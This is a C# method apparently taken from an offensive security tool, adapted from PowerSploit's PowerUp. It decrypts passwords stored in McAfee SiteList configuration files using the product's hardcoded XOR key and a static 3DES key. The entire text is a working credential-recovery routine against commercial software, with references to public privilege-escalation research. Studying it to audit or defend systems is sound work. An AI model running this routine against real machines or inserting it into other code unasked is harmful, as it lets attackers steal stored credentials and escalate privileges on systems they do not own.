private static string DecryptPassword(string base64password) { // Adapted from PowerUp: https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1#L4128-L4326 // References: // https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ // https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/ // https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md // https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf // static McAfee key XOR key LOL byte[] XORKey = { 0x12, 0x15, 0x0F, 0x10, 0x11, 0x1C, 0x1A, 0x06, 0x0A, 0x1F, 0x1B, 0x18, 0x17, 0x16, 0x05, 0x19 }; // xor the input b64 string with the static XOR key var passwordBytes = System.Convert.FromBase64String(base64password); for (var i = 0; i < passwordBytes.Length; i++) { passwordBytes[i] = (byte)(passwordBytes[i] ^ XORKey[i % XORKey.Length]); } SHA1 crypto = new SHA1CryptoServiceProvider(); var tDESKey = MyUtils.CombineArrays(crypto.ComputeHash(System.Text.Encoding.ASCII.GetBytes("<!@#$%^>")), new byte[] { 0x00, 0x00, 0x00, 0x00 }); // set the options we need var tDESalg = new TripleDESCryptoServiceProvider(); tDESalg.Mode = CipherMode.ECB; tDESalg.Padding = PaddingMode.None; tDESalg.Key = tDESKey; // decrypt the unXor'ed block var decrypted = tDESalg.CreateDecryptor().TransformFinalBlock(passwordBytes, 0, passwordBytes.Length); var end = Array.IndexOf(decrypted, (byte)0x00); // return the final password string var password = System.Text.Encoding.ASCII.GetString(decrypted, 0, end); return(password); }